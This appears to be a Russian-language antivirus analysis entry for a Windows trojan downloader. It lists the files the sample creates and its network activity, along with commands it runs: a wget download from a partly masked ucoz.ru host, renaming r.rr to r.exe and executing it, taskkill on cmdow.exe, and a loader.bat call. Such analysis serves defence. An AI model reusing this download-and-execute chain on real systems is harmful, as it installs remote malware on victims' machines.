Техническая информация
Вредоносные функции:
Создает и запускает на исполнение:
- '%WINDIR%\r.exe'
- '%WINDIR%\wget.exe' http://re#####ystem.ucoz.ru/r.rr
- '%WINDIR%\r.exe' (загружен из сети Интернет)
Запускает на исполнение:
- '<SYSTEM32>\taskkill.exe' /F /IM cmdow.exe
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\loader.bat" "
Изменения в файловой системе:
Создает следующие файлы:
- %PROGRAM_FILES%\Company\NewProduct\Uninstall.exe
- %PROGRAM_FILES%\Company\NewProduct\Uninstall.ini
- %WINDIR%\r.rr
- %WINDIR%\loader.bat
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %WINDIR%\wget.exe
Удаляет следующие файлы:
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
Перемещает следующие файлы:
- %WINDIR%\r.rr в %WINDIR%\r.exe
Сетевая активность:
Подключается к:
- 're#####ystem.ucoz.ru':80
TCP:
Запросы HTTP GET:
- re#####ystem.ucoz.ru/r.rr
UDP:
- DNS ASK re#####ystem.ucoz.ru
Другое:
Ищет следующие окна:
- ClassName: '(null)' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
